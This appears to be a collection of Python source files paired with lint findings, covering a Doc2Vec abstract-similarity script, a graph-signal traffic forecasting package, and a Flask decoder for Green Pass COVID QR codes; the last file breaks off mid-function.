1 # coding=utf-8 2 import os 3 import re 4 import numpy as np 5 from abstract import Abstract 6 7 __author__ = 'rcastro' 8 9 from gensim.models import Doc2Vec 10 from gensim.models.doc2vec import TaggedLineDocument, TaggedDocument 11 from codecs import open 12 13 14 def remove_numeric_tokens(string): 15 return re.sub(r'\d+[^\w|-]+', ' ', string) 16 17 18 # Convert text to lower-case and strip punctuation/symbols from words 19 def normalize_text(text): 20 norm_text = text.lower() 21 # control_chars = [chr(0x85)] 22 # for c in control_chars: 23 # norm_text = norm_text.replace(c, ' ') # Replace breaks with spaces 24 # norm_text = norm_text.replace('<br />', ' ') 25 26 # Pad punctuation with spaces on both sides 27 for char in ['.', '"', ',', '!', '?', ';', ':']: 28 norm_text = norm_text.replace(char, ' ' + char + ' ') 29 30 return norm_text 31 32 33 sentences_keywords = [] 34 docs_filename = 'abstracts_preprocesados.txt' 35 if not os.path.isfile(docs_filename): 36 print "get the abstracts" 37 text = '' 38 try: 39 with open('abstracts.txt', 'r', encoding='utf8') as abstracts_file: 40 text = abstracts_file.read().strip() 41 except IOError as e: 42 print 'no pudo leer los abstracts: %s' % e.strerror 43 44 abstracts = [Abstract(x) for x in text.split("\r\n\r\n")] 45 for article in abstracts: 46 sentences_keywords.append([normalize_text(remove_numeric_tokens(x)).strip() for x in article.keywords]) 47 with open(docs_filename, 'w', encoding='utf8') as f: 48 for idx, line in enumerate([normalize_text(remove_numeric_tokens(x.text)) for x in abstracts]): 49 f.write(line + '\n') 50 # # num_line = "_*{0} {1}\n".format(idx, line) 51 # # f.write(line+'\n') 52 53 sentences = TaggedLineDocument('abstracts_preprocesados.txt') 54 # sentences = sentences_keywords 55 56 57 # Vamos a utilizar Doc2vec, ver http://rare-technologies.com/doc2vec-tutorial/ 58 59 from gensim.models import Doc2Vec 60 import gensim.models.doc2vec 61 from collections import OrderedDict 62 import multiprocessing 63 64 cores = multiprocessing.cpu_count() 65 assert gensim.models.doc2vec.FAST_VERSION > -1, "this will be painfully slow otherwise" 66 67 # Set values for various parameters 68 num_features = 400 # Word vector dimensionality 69 # min_word_count = 1 # Minimum word count 70 # context = 20 # Context window size 71 # downsampling = 1e-3 # Downsample setting for frequent words 72 73 # 3 modelos diferentes con veectores de 50 variables 74 simple_models = [ 75 # PV-DM w/concatenation - window=10 (both sides) approximates paper's 10-word total window size 76 Doc2Vec(dm=1, dm_concat=1, size=50, window=10, negative=10, hs=0, min_count=2, workers=cores), 77 # PV-DBOW 78 Doc2Vec(dm=0, size=50, negative=5, hs=0, min_count=2, workers=cores), 79 # PV-DM w/average 80 Doc2Vec(dm=1, dm_mean=1, size=50, window=10, negative=5, hs=0, min_count=2, workers=cores), 81 ] 82 83 # 3 modelos diferentes con veectores de 400 variables 84 simple_models_400 = [ 85 # PV-DM w/concatenation - window=5 (both sides) approximates paper's 10-word total window size 86 Doc2Vec(dm=1, dm_concat=1, size=num_features, window=10, negative=10, hs=0, min_count=2, workers=cores), 87 # PV-DBOW 88 Doc2Vec(dm=0, size=num_features, negative=5, hs=0, min_count=2, workers=cores), 89 # PV-DM w/average 90 Doc2Vec(dm=1, dm_mean=1, size=num_features, window=10, negative=5, hs=0, min_count=2, workers=cores), 91 ] 92 93 # speed setup by sharing results of 1st model's vocabulary scan 94 simple_models[0].build_vocab(sentences) # PV-DM/concat requires one special NULL word so it serves as template 95 print(simple_models[0]) 96 for model in simple_models[1:]: 97 model.reset_from(simple_models[0]) 98 print(model) 99 100 101 for model in simple_models_400: 102 model.reset_from(simple_models[0]) 103 print(model) 104 105 all_models = simple_models+simple_models_400 106 models_by_name = OrderedDict((str(model), model) for model in all_models) 107 108 ''' 109 Following the paper, we also evaluate models in pairs. These wrappers return the concatenation of the vectors from each model. (Only the singular models are trained.) 110 In [5]: 111 from gensim.test.test_doc2vec import ConcatenatedDoc2Vec 112 models_by_name['dbow+dmm'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[2]]) 113 models_by_name['dbow+dmc'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[0]]) 114 ''' 115 116 from random import shuffle 117 import datetime 118 119 # for timing 120 from contextlib import contextmanager 121 from timeit import default_timer 122 import random 123 124 @contextmanager 125 def elapsed_timer(): 126 start = default_timer() 127 elapser = lambda: default_timer() - start 128 yield lambda: elapser() 129 end = default_timer() 130 elapser = lambda: end-start 131 132 passes = 20 133 print("START %s" % datetime.datetime.now()) 134 135 all_docs = [] 136 for doc in sentences: 137 all_docs.append(doc) 138 for epoch in range(passes): 139 shuffle(all_docs) # shuffling gets best results 140 141 # doc_id = np.random.randint(len(sentences)) # 142 doc_id = np.random.randint(simple_models[0].docvecs.count) # pick random doc, (escoge un abstract aleatorio y busca los mas simijantes) 143 144 for name, model in models_by_name.items()[:3]: 145 with elapsed_timer() as elapsed: 146 model.train(all_docs) 147 # duration = '%.1f' % elapsed() 148 # print (name, duration) 149 sims = model.docvecs.most_similar(doc_id, topn=model.docvecs.count) # get *all* similar documents 150 print(u'ABSTRACTS mas similares por modelo %s:\n' % model) 151 print(u'abstract escogido: «%s»\n' % (' '.join(all_docs[doc_id].words))) 152 print(u'y sus keywords: «%s»\n' % (' '.join(sentences_keywords[doc_id]))) 153 for label, index in [('MOST', 0)]: #, ('MEDIAN', len(sims)//2), ('LEAST', len(sims) - 1)]: 154 print(u'%s %s: «%s»\n' % (label, sims[index][1], ' '.join(all_docs[sims[index][0]].words))) 155 print(u'Keywords de los docs similares: «%s»\n' % (' '.join(sentences_keywords[sims[index][0]]))) 156 157 158 word_models = all_models[:3] 159 # while True: 160 # word = random.choice(word_models[0].index2word) 161 # if word_models[0].vocab[word].count > 10 and len(word)>3: 162 # break 163 164 # aqui puedes sustituir por una palabra, y ver que palabras similares te salen de acuerdo a los modelos... 165 word = "aquaculture" #diadromous 166 similars_per_model = [str(model.most_similar(word, topn=5)).replace('), ','),<br>\n') for model in word_models] 167 similar_table = ("<table><tr><th>" + 168 "</th><th>".join([str(model) for model in word_models]) + 169 "</th></tr><tr><td>" + 170 "</td><td>".join(similars_per_model) + 171 "</td></tr></table>") 172 print("most similar words for '%s' (%d occurences)" % (word, simple_models[0].vocab[word].count)) 173 print(similar_table) 174 175 #TODO import wiki model and add to word_models
36 - error: syntax-error
1 2 import time 3 import numpy as np 4 import pandas as pd 5 import torch 6 import torch.utils.data as utils 7 8 from pytorch_gsp.utils.gsp import complement 9 10 11 def PrepareSequence(data, seq_len = 10, pred_len = 1): 12 13 time_len = data.shape[0] 14 sequences, labels = [], [] 15 for i in range(time_len - seq_len - pred_len): 16 sequences.append(data[i:i+seq_len]) 17 labels.append(data[i+seq_len+pred_len-1:i+seq_len+pred_len]) 18 return np.asarray(sequences), np.asarray(labels) 19 20 21 22 def SplitData(data, label = None, seq_len = 10, pred_len = 1, train_proportion = 0.7, 23 valid_proportion = 0.2, shuffle = False): 24 25 max_value = np.max(data) 26 data /= max_value 27 samp_size = data.shape[0] 28 if label is not None: 29 assert(label.shape[0] == samp_size) 30 31 index = np.arange(samp_size, dtype = int) 32 train_index = int(np.floor(samp_size * train_proportion)) 33 valid_index = int(np.floor(samp_size * ( train_proportion + valid_proportion))) 34 35 if label is not None: 36 train_data, train_label = data[:train_index+pred_len-1], label[:train_index+pred_len-1] 37 valid_data, valid_label = data[train_index-seq_len:valid_index+pred_len-1], label[train_index-seq_len:valid_index+pred_len-1] 38 test_data, test_label = data[valid_index-seq_len:], label[valid_index-seq_len:] 39 return (train_data, train_label), (valid_data, valid_label), (test_data, test_label), max_value 40 41 else: 42 train_data = data[:train_index+pred_len-1] 43 valid_data = data[train_index-seq_len:valid_index+pred_len-1] 44 test_data = data[valid_index-seq_len:] 45 return train_data ,valid_data, test_data, max_value 46 47 48 49 def Dataloader(data, label, batch_size = 40, suffle = False): 50 51 data, label = torch.Tensor(data), torch.Tensor(label ) 52 dataset = utils.TensorDataset(data, label) 53 dataloader = utils.DataLoader(dataset, batch_size = batch_size, shuffle=suffle, drop_last = True) 54 return dataloader 55 56 57 def Preprocessing_hop_interp(matrix, A ,sample): 58 59 unknown = complement(sample,matrix.shape[1]) 60 features_unknown = np.copy(matrix.values) 61 features_unknown[:,unknown] = np.mean(matrix.values[:100,sample]) 62 for node in unknown: 63 neighbors = np.nonzero(A[node])[0] 64 for t in range(features_unknown.shape[0]): 65 features_unknown[np.array([t]), np.array([node])] = np.mean(features_unknown[t, neighbors]) 66 return features_unknown 67 68 69 def MaxScaler(data): 70 max_value = np.max(data) 71 return max_value, data/max_value 72 73 def Preprocessing_GFT(matrix,sample, V , freqs ): 74 75 x = matrix.T 76 Vf = V[:, freqs] 77 Psi = np.zeros((V.shape[0],x.shape[1])) 78 Psi[sample] = x 79 Tx = (Vf.T@Psi).T 80 return Tx 81 82 class DataPipeline: 83 def __init__(self, sample, V , freqs ,seq_len, pred_len, gft = True): 84 """ 85 DataPipeline: perform the sampling procedure on the graph signals and create the dataloader object 86 Args: 87 sample (np array): list of graph indices 88 V (2D np array): Laplacian eigenvector matrix 89 freqs (np array): list of frequency indices 90 seq_len (int, optional): size of historical data. Defaults to 10. 91 pred_len (int, optional): number of future samples. Defaults to 1. 92 gft (bool, optional): if Fourier transform should be applied. Defaults to False. 93 """ 94 95 self.sample = sample 96 self.V = V 97 self.freqs = freqs 98 self.seq_len = seq_len 99 self.pred_len = pred_len 100 self.gft = gft 101 102 def fit(self,train_data,sample_label = True, batch_size=40, shuffle=True): 103 """ 104 fit: build dataloader for training data 105 106 Args: 107 train_data (numpy array): train data 108 sample_label (bool, optional): If labels should be sampled for a semisupervised 109 learning. Defaults to True. 110 batch_size (int, optional): batch size. Defaults to 40. 111 shuffle (bool, optional): If samples should be shuffled. Defaults to True. 112 113 Returns: 114 pytorch Dataloader: train data prepared for training 115 """ 116 117 train_X, train_y = PrepareSequence(train_data, seq_len = self.seq_len, pred_len = self.pred_len) 118 119 if self.gft: 120 train_data_freqs = Preprocessing_GFT(train_data[:,self.sample],self.sample, self.V , self.freqs ) 121 train_X_freqs, _ = PrepareSequence(train_data_freqs, seq_len = self.seq_len, pred_len = self.pred_len) 122 train_X = np.concatenate((train_X[:,:,self.sample], train_X_freqs), axis=-1) 123 124 if sample_label: 125 train_y = train_y.T[self.sample] 126 train_y = train_y.T 127 128 return Dataloader(train_X, train_y, batch_size, shuffle) 129 130 def transform(self, data, sample_label = True, batch_size=40,shuffle=True): 131 """ 132 transform: build dataloader for validation and test data 133 134 Args: 135 train_data (numpy array): train data 136 sample_label (bool, optional): If validation labels should be sampled for a 137 semisupervised learning. Defaults to True. 138 batch_size (int, optional): batch size. Defaults to 40. 139 shuffle (bool, optional): If samples should be shuffled. Defaults to True. 140 141 Returns: 142 pytorch Dataloader: train data prepared for training 143 """ 144 145 X, y = PrepareSequence(data, seq_len = self.seq_len, pred_len = self.pred_len) 146 147 if self.gft: 148 data_freqs = Preprocessing_GFT(data[:,self.sample],self.sample, self.V , self.freqs) 149 X_freqs, _ = PrepareSequence(data_freqs, seq_len = self.seq_len, pred_len = self.pred_len) 150 151 X = np.concatenate((X[:,:,self.sample], X_freqs), axis=-1) 152 if sample_label: 153 y = y.T[self.sample] 154 y = y.T 155 return Dataloader(X, y, batch_size, shuffle) 156 157 158 159 160 161 162 163
22 - refactor: too-many-arguments 22 - refactor: too-many-positional-arguments 22 - refactor: too-many-locals 35 - refactor: no-else-return 23 - warning: unused-argument 31 - warning: unused-variable 83 - refactor: too-many-arguments 83 - refactor: too-many-positional-arguments 2 - warning: unused-import 4 - warning: unused-import
1 import os 2 import time 3 import torch 4 import argparse 5 import numpy as np 6 import pandas as pd 7 import time 8 9 from data.Load_data import Seattle_data 10 from data.Dataloader import * 11 12 from pytorch_gsp.train.train_rnn import Evaluate, Train 13 from pytorch_gsp.utils.gsp import ( greedy_e_opt, spectral_components) 14 from pytorch_gsp.models.sggru import * 15 16 def n_params(model): 17 params=[] 18 for param in model.parameters(): 19 params.append(param.numel()) 20 return np.sum(params) 21 22 print(torch.__version__) 23 24 25 26 def training_routine(args): 27 28 29 device = 'cuda' if torch.cuda.is_available else 'cpu' 30 if args.device == 'cuda' and device == 'cpu': 31 print("cuda is not available, device set to cpu") 32 else: 33 assert (args.device in ['cpu','cuda']) 34 device = args.device 35 36 lr = args.lr 37 epochs = args.epochs 38 seq_len = args.seq_len 39 pred_len = args.pred_len 40 patience = args.patience 41 name = args.save_name 42 speed_matrix, A, FFR = Seattle_data('data/Seattle_Loop_Dataset/') #put seattle Loop dataset in this directory 43 44 45 N = speed_matrix.shape[1] 46 47 S = int(args.sample_perc*N/100) 48 if args.F_perc is None: 49 F = int(S/3) 50 else: 51 F = int(args.F_perc*N/100) 52 53 assert(S>F) # the sampling set must be larger than the spectral support 54 55 #compute gft 56 F_list, V = spectral_components(A,np.array(speed_matrix)[:1000] ) 57 if args.supervised: 58 freqs = F_list[:F] 59 else: 60 freqs = np.arange(0,F,1) 61 62 if args.e_opt: 63 print("Using e-optimal greedy algorithm") 64 if args.sample_perc == 25: 65 sample = np.load( 'data/Seattle_Loop_Dataset/sample_opt25.npy')[0] 66 elif args.sample_perc == 50: 67 sample = np.load( 'data/Seattle_Loop_Dataset/sample_opt50.npy')[0] 68 elif args.sample_perc == 75: 69 sample = np.load( 'data/Seattle_Loop_Dataset/sample_opt75.npy')[0] 70 else: 71 sample = greedy_e_opt(V[:,Fs],S) 72 73 else: sample = np.sort(np.random.choice(np.arange(N), S, replace = False)) 74 75 S = len(sample) 76 pre_time = time.time() 77 78 train, valid, test,max_value = SplitData(speed_matrix.values, label = None, seq_len = 10, 79 pred_len = 1, train_proportion = 0.7, 80 valid_proportion = 0.2, shuffle = False) 81 82 pipeline = DataPipeline(sample,V,freqs,seq_len,pred_len) 83 84 train_dataloader = pipeline.fit(train) 85 valid_dataloader = pipeline.transform(valid) 86 test_dataloader = pipeline.transform(test,sample_label=False,batch_size = test.shape[0]-seq_len-pred_len,shuffle=False) 87 88 print("Preprocessing time:", time.time()-pre_time) 89 90 91 layer = SpectralGraphForecast(V, sample,freqs, rnn = 'gru') 92 if args.supervised: 93 sggru = model(V,sample,freqs, layer,l1=0,l2=0.0,supervised = True).to(device) 94 else: 95 sggru = model(V,sample,freqs, layer,l1=0,l2=0.0,supervised = False).to(device) 96 97 pre_time = time.time() 98 99 print("Total number of nodes: {}".format(N)) 100 print("Sample size: {}".format(S)) 101 print("Spectral sample size: {}".format(F)) 102 print("Initial learning rate: {}".format(lr)) 103 104 105 sggru,sggru_loss= Train(sggru ,train_dataloader, valid_dataloader, epochs = epochs, 106 learning_rate = lr,patience=patience ,sample = sample) 107 print("Training time:", time.time()-pre_time) 108 pre_time = time.time() 109 sggru_test = Evaluate(sggru.to(device), test_dataloader, max_value ) 110 print("Test time:", time.time()-pre_time) 111 name = 'sggru' 112 113 loss = (sggru_loss,sggru_test) 114 os.makedirs("models_and_losses/", exist_ok=True) 115 torch.save(sggru, "models_and_losses/{}.pt".format(name)) 116 np.save("models_and_losses/{}.npy".format(name),loss) 117 118 119 if __name__ == "__main__": 120 parser = argparse.ArgumentParser(description='Semi-Supervised Prediction\n SeattleLoop dataset \n download link: https://github.com/zhiyongc/Seattle-Loop-Data ') 121 parser.add_argument('--epochs', type=int, default = 100, help='maximum number of epochs before stopping training') 122 parser.add_argument('--lr', type=float, default = 1e-4, help='starting learn rate' ) 123 parser.add_argument('--patience', type=int, default = 10, help='number of consecutive non-improving validation loss epochs before stop training') 124 parser.add_argument('--sample-perc', type=int, default = 50, help='percentage of in-sample nodes') 125 parser.add_argument('--F-perc', type=int, default = None, help='percentage of frequencies to keep in frequency set \mathcal{F}') 126 parser.add_argument('--S-perc', type=int, default = 50, help='percentage of samples') 127 parser.add_argument('--e-opt', action='store_true',help='if sampling is performed by E-optmal greedy algorithm') 128 parser.add_argument('--sample-seed',type=int,default=1, help='number of run with uniformely random samples. Only used if --e-opt is False') 129 parser.add_argument('--seq-len', type=int,default=10, help='history length') 130 parser.add_argument('--pred-len', type=int,default=1, help='prediction horizon') 131 parser.add_argument('--save-name', type=str, default='sggru_S50_F53_opt_pred1', help='name of file') 132 parser.add_argument('--supervised', action='store_true', help='if training is supervised or semi-supervised. Deafault is semi-supervised') 133 parser.add_argument('--device', type=str, default='cuda', help='devices: cuda or cpu') 134 args = parser.parse_args() 135 training_routine(args) 136
125 - warning: anomalous-backslash-in-string 7 - warning: reimported 10 - warning: wildcard-import 14 - warning: wildcard-import 26 - refactor: too-many-locals 26 - warning: redefined-outer-name 29 - warning: missing-parentheses-for-call-in-test 29 - warning: using-constant-test 71 - error: undefined-variable 78 - error: undefined-variable 82 - error: undefined-variable 91 - error: undefined-variable 93 - error: undefined-variable 95 - error: undefined-variable 26 - refactor: too-many-branches 26 - refactor: too-many-statements 42 - warning: unused-variable 6 - warning: unused-import
1 import os 2 import sys 3 4 current_dir = os.path.split(os.path.dirname(os.path.realpath(__file__)))[0] 5 sys.path.append(os.path.join(current_dir, 'data')) 6 print(sys.path)
Clean Code: No Issues Detected
1 import math 2 import sys 3 import time 4 5 import numpy as np 6 import pandas as pd 7 from sklearn.metrics.pairwise import rbf_kernel 8 9 10 11 def USA_data(directory ): 12 """"TODO: include the GSOD dataset""" 13 signals = pd.read_csv( directory + 'Usa_temp.csv') 14 if "Unnamed: 0" in signals.columns: 15 signals.drop(columns="Unnamed: 0", inplace = True) 16 A = np.load( directory + 'Adjk10_07-13.npy') 17 18 return signals, A 19 20 21 def Seattle_data(directory , binary=False): 22 """ 23 Seattle_data: 24 https://github.com/zhiyongc/Graph_Convolutional_LSTM/blob/master/Code_V2/HGC_LSTM%20%26%20Experiments.ipynb 25 26 Args: 27 directory (str): directory of the seattle loop detector dataset 28 binary (bool, optional): I the matrix should be binary or the RBF kernel should 29 be used on the . Defaults to False. 30 31 Returns: 32 speed_matrix: graph signals with time in the rows and nodes in the columns 33 A: adjacency matrix 34 FFR: free flow reachability matrices 35 """ 36 speed_matrix = pd.read_pickle( directory + 'speed_matrix_2015',) 37 A = np.load( directory + 'Loop_Seattle_2015_A.npy') 38 39 if not binary: 40 cor = rbf_kernel(speed_matrix[:1000].T/10) 41 A = cor*(A) 42 e, V = np.linalg.eigh(A) 43 A/=np.max(e) 44 A = A-np.diag(A.diagonal()) 45 46 FFR_5min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_5min.npy') 47 FFR_10min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_10min.npy') 48 FFR_15min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_15min.npy') 49 FFR_20min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_20min.npy') 50 FFR_25min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_25min.npy') 51 FFR = [FFR_5min, FFR_10min, FFR_15min, FFR_20min, FFR_25min] 52 return speed_matrix, A, FFR 53 54 55 56 57 58
42 - warning: unused-variable 1 - warning: unused-import 2 - warning: unused-import 3 - warning: unused-import
1 from setuptools import setup, find_packages 2 3 setup( 4 name='Joint-Forecasting-and-Interpolation-of-Graph-Signals-Using-Deep-Learning', 5 version='0.1.0', 6 author='Gabriela Lewenfus', 7 author_email='gabriela.lewenfus@gmail.com', 8 packages=find_packages(), 9 install_requires = ['scipy>=1.4.1', 'pandas>=0.15', 'scikit-learn>=0.22', 'numpy>=0.46'], 10 description='Code from the paper Joint Forecasting and Interpolation of Graph Signals Using Deep Learning', 11 12 )
Clean Code: No Issues Detected
1 ### training code #### 2 3 import sys 4 import time 5 6 import numpy as np 7 import torch 8 from torch.autograd import Variable 9 10 toolbar_width=20 11 12 13 14 def Train(model, train_dataloader, valid_dataloader, learning_rate = 1e-5, epochs = 300, patience = 10, 15 verbose=1, gpu = True, sample = None, optimizer = 'rmsprop'): 16 17 if optimizer == 'rmsprop': 18 optimizer = torch.optim.RMSprop(model.parameters(), lr = learning_rate) 19 elif optimizer == 'adam': 20 optimizer = torch.optim.Adam(model.parameters(), lr = learning_rate ) 21 22 loss_MSE = torch.nn.MSELoss() 23 loss_L1 = torch.nn.L1Loss() 24 batch_size = train_dataloader.batch_size 25 26 if gpu: device='cuda' 27 else: device= 'cpu' 28 29 losses_epochs_train = [] 30 losses_epochs_valid = [] 31 time_epochs = [] 32 time_epochs_val = [] 33 34 is_best_model = 0 35 patient_epoch = 0 36 scheduler = model.schedule(optimizer) 37 38 for epoch in range(epochs): 39 pre_time = time.time() 40 41 try: 42 data_size=train_dataloader.dataset.data_size 43 except: pass 44 try: 45 data_size=train_dataloader.dataset.tensors[0].shape[0] 46 except: pass 47 n_iter=data_size/train_dataloader.batch_size 48 if verbose: 49 count=0 50 51 checkpoints=np.linspace(0,n_iter,toolbar_width).astype(np.int16) 52 text='Epoch {:02d}: '.format(epoch) 53 sys.stdout.write(text+"[%s]" % (" " * toolbar_width)) 54 sys.stdout.flush() 55 sys.stdout.write("\b" * (toolbar_width+1)) 56 57 losses_train = [] 58 losses_valid = [] 59 60 for data in train_dataloader: 61 inputs, labels = data 62 if inputs.shape[0] != batch_size: 63 continue 64 65 model.zero_grad() 66 outputs = model(inputs.to(device)) 67 outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device) 68 loss_train = model.loss(outputs,y) 69 70 losses_train.append(loss_train.cpu().data.numpy()) 71 optimizer.zero_grad() 72 loss_train.backward() 73 optimizer.step() 74 75 if verbose: 76 if count in checkpoints: 77 sys.stdout.write('=') 78 sys.stdout.flush() 79 count+=1 80 81 for param_group in optimizer.param_groups: 82 learning_rate = param_group['lr'] 83 if learning_rate >1e-5: 84 scheduler.step() 85 time_epochs.append(time.time()-pre_time) 86 87 pre_time = time.time() 88 89 losses_valid = [] 90 for data in valid_dataloader: 91 inputs, labels = data 92 if inputs.shape[0] != batch_size: 93 continue 94 95 outputs= model(inputs.to(device)) 96 outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device) 97 losses_valid.append(model.loss(outputs, y).cpu().data.numpy()) 98 99 time_epochs_val.append(time.time()-pre_time) 100 losses_epochs_train.append(np.mean(losses_train)) 101 losses_epochs_valid.append(np.mean(losses_valid)) 102 103 avg_losses_epoch_train = losses_epochs_train[-1] 104 avg_losses_epoch_valid = losses_epochs_valid[-1] 105 106 107 if avg_losses_epoch_valid >100000000000: 108 print("Diverged") 109 return (None,None) 110 if epoch == 0: 111 is_best_model = True 112 best_model = model 113 min_loss = avg_losses_epoch_valid 114 else: 115 if min_loss - avg_losses_epoch_valid > 1e-6: 116 is_best_model = True 117 best_model = model 118 min_loss = avg_losses_epoch_valid 119 patient_epoch = 0 120 else: 121 is_best_model = False 122 patient_epoch += 1 123 if patient_epoch >= patience: 124 print('Early Stopped at Epoch:', epoch) 125 break 126 127 if verbose: 128 sys.stdout.write("]") 129 130 print(' train loss: {}, valid loss: {}, time: {}, lr: {}'.format( \ 131 np.around(avg_losses_epoch_train, 6),\ 132 np.around(avg_losses_epoch_valid, 6),\ 133 np.around([time_epochs[-1] ] , 2),\ 134 learning_rate) ) 135 136 137 return best_model, [losses_epochs_train , 138 losses_epochs_valid , 139 time_epochs , 140 time_epochs_val ] 141 142 143 def Evaluate(model, dataloader, scale=1, pred_len = 1, gpu = True): 144 145 batch_size = dataloader.batch_size 146 pre_time = time.time() 147 148 gpu = torch.cuda.is_available() 149 if gpu: device='cuda' 150 else: device= 'cpu' 151 152 losses_mse = [] 153 losses_l1 = [] 154 losses_mape = [] 155 156 for i,data in enumerate(dataloader): 157 inputs, labels = data 158 if inputs.shape[0] != batch_size: 159 continue 160 161 outputs = model(inputs.to(device)) 162 outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device) 163 164 loss_mse = torch.nn.MSELoss()(outputs*scale, y*scale).cpu().data 165 loss_l1 = torch.nn.L1Loss()(outputs*scale, y*scale).cpu().data 166 167 outputs = outputs.cpu().data.numpy() 168 y = y.cpu().data.numpy() 169 outputs = outputs*scale 170 y = y*scale 171 172 abs_diff = np.abs((outputs-y)) 173 abs_y = np.abs(y) 174 abs_diff=abs_diff[abs_y>1] 175 abs_y=abs_y[abs_y>1] 176 177 loss_mape = abs_diff/abs_y 178 loss_mape = np.mean(loss_mape)*100 179 180 losses_mse.append(loss_mse) 181 losses_l1.append(loss_l1) 182 losses_mape.append(loss_mape) 183 184 losses_l1 = np.array(losses_l1) 185 losses_mse = np.array(losses_mse) 186 mean_l1 = np.mean(losses_l1, axis = 0) 187 rmse = np.mean(np.sqrt(losses_mse)) 188 print('Test: MAE: {}, RMSE : {}, MAPE : {}'.format(mean_l1, rmse,np.mean(losses_mape))) 189 190 191 return [losses_l1, losses_mse, mean_l1, np.mean(losses_mape), time.time()-pre_time] 192 193 194 ### modified from https://github.com/zhiyongc/Graph_Convolutional_LSTM/blob/master/Code_V2/HGC_LSTM%20%26%20Experiments.ipynb
14 - refactor: too-many-arguments 14 - refactor: too-many-positional-arguments 14 - refactor: too-many-locals 43 - warning: bare-except 46 - warning: bare-except 14 - refactor: too-many-branches 14 - refactor: too-many-statements 15 - warning: unused-argument 22 - warning: unused-variable 23 - warning: unused-variable 34 - warning: unused-variable 143 - refactor: too-many-locals 143 - warning: unused-argument 156 - warning: unused-variable 8 - warning: unused-import
1 from flask import Flask, redirect, request, render_template 2 from os.path import splitext 3 from flask_sslify import SSLify 4 from flask_babel import Babel, gettext 5 import os 6 from lib.greenpass import GreenPassDecoder as greenpass_decoder 7 8 is_prod = os.environ.get('PRODUCTION', None) 9 ga_id = os.environ.get('GA_ID', None) 10 sharethis_script_src = os.environ.get('SHARETHIS_SCRIPT_SRC', None) 11 app_url = os.environ.get('APP_URL', None) 12 13 app = Flask(__name__) 14 15 app.config['BABEL_DEFAULT_LOCALE'] = 'en' 16 app.config['MAX_CONTENT_LENGTH'] = 4096 * 1024 17 app.config['UPLOAD_EXTENSIONS'] = ['.jpg', '.png', '.jpeg'] 18 app.config['GITHUB_PROJECT'] = 'https://github.com/debba/greenpass-covid19-qrcode-decoder' 19 app.config[ 20 'DCC_SCHEMA'] = 'https://raw.githubusercontent.com/ehn-dcc-development/ehn-dcc-schema/release/1.3.0/DCC.combined-schema.json' 21 app.glb_schema = {} 22 app.converted_schema = '' 23 app.config['LANGUAGES'] = { 24 'en': 'English', 25 'it': 'Italiano' 26 } 27 babel = Babel(app) 28 29 30 @babel.localeselector 31 def get_locale(): 32 return request.accept_languages.best_match(app.config['LANGUAGES'].keys()) 33 34 35 if is_prod: 36 sslify = SSLify(app) 37 38 39 @app.context_processor 40 def inject_user(): 41 return dict(github_project=app.config['GITHUB_PROJECT'], is_prod=is_prod, ga_id=ga_id, 42 sharethis_script_src=sharethis_script_src, app_url=app_url, 43 app_name=gettext('Green Pass COVID-19 QRCode Decoder')) 44 45 46 @app.route('/', methods=['GET']) 47 def home(): 48 return render_template('home.html') 49 50 51 @app.route('/qrdata', methods=['GET', 'POST']) 52 def qrdata(): 53 if request.method == 'POST': 54 if request.files['image'].filename != '': 55 app.converted_schema = '' 56 image = request.files['image'] 57 filename = image.filename 58 file_ext = splitext(filename)[1] 59 if filename != '': 60 if file_ext not in app.config['UPLOAD_EXTENSIONS']: 61 return render_template('error.html', error='UPLOAD_EXTENSIONS_ERROR', file_ext=file_ext), 400 62 63 try: 64 decoder = greenpass_decoder(image.stream) 65 return render_template('data.html', data=decoder.decode(app.config['DCC_SCHEMA'])) 66 except (ValueError, IndexError) as e: 67 print(e) 68 return render_template('error.html', error='UPLOAD_IMAGE_NOT_VALID'), 400 69 70 return render_template('error.html', error='UPLOAD_IMAGE_WITH_NO_NAME'), 500 71 else: 72 return redirect('/')
41 - refactor: use-dict-literal 53 - refactor: no-else-return
1 from pyzbar.pyzbar import decode 2 from PIL import Image 3 from base45 import b45decode 4 from zlib import decompress 5 from flynn import decoder as flynn_decoder 6 from lib.datamapper import DataMapper as data_mapper 7 8 9 class GreenPassDecoder(object): 10 stream_data = None 11 12 def __init__(self, stream_data): 13 self.stream_data = decode(Image.open(stream_data))[0].data 14 15 def decode(self, schema): 16 qr_decoded = self.stream_data[4:] 17 qrcode_data = decompress(b45decode(qr_decoded)) 18 (_, (header_1, header_2, cbor_payload, sign)) = flynn_decoder.loads(qrcode_data) 19 data = flynn_decoder.loads(cbor_payload) 20 dm = data_mapper(data, schema) 21 return dm.convert_json()
9 - refactor: useless-object-inheritance 18 - warning: unused-variable 18 - warning: unused-variable 18 - warning: unused-variable 9 - refactor: too-few-public-methods
1 import json 2 from urllib.request import urlopen 3 4 5 class DataMapperError(Exception): 6 pass 7 8 9 class DataMapper: 10 qr_data = None 11 schema = None 12 13 json = '' 14 new_json = {} 15 16 def _save_json(self, data, schema, level=0): 17 18 for key, value in data.items(): 19 try: 20 description = schema[key].get('title') or schema[key].get('description') or key 21 description, _, _ = description.partition(' - ') 22 if type(value) is dict: 23 self.json += '<p>' + ('&nbsp;' * level) + '<strong>' + description + '</strong></p>' 24 _, _, sch_ref = schema[key]['$ref'].rpartition('/') 25 self._save_json(value, self.schema['$defs'][sch_ref]['properties'], level + 1) 26 elif type(value) is list: 27 self.json += '<p>' + ('&nbsp;' * level) + '<strong>' + description + '</strong></p>' 28 _, _, sch_ref = schema[key]['items']['$ref'].rpartition('/') 29 for v in value: 30 self._save_json(v, self.schema['$defs'][sch_ref]['properties'], level + 1) 31 else: 32 self.json += '<p>' + ('&nbsp;' * level) + '<strong>' + description + '</strong>' + ':' + str( 33 value) + '</p>' 34 except KeyError: 35 print('error keys') 36 print(data) 37 38 def __set_schema(self, schema_url): 39 sch = urlopen(schema_url) 40 self.schema = json.load(sch) 41 42 def __init__(self, qr_data, schema_url, params_string=False): 43 44 i = -260 45 j = 1 46 47 if params_string: 48 i = str(i) 49 j = str(j) 50 51 self.json = '' 52 self.qr_data = qr_data[i][j] 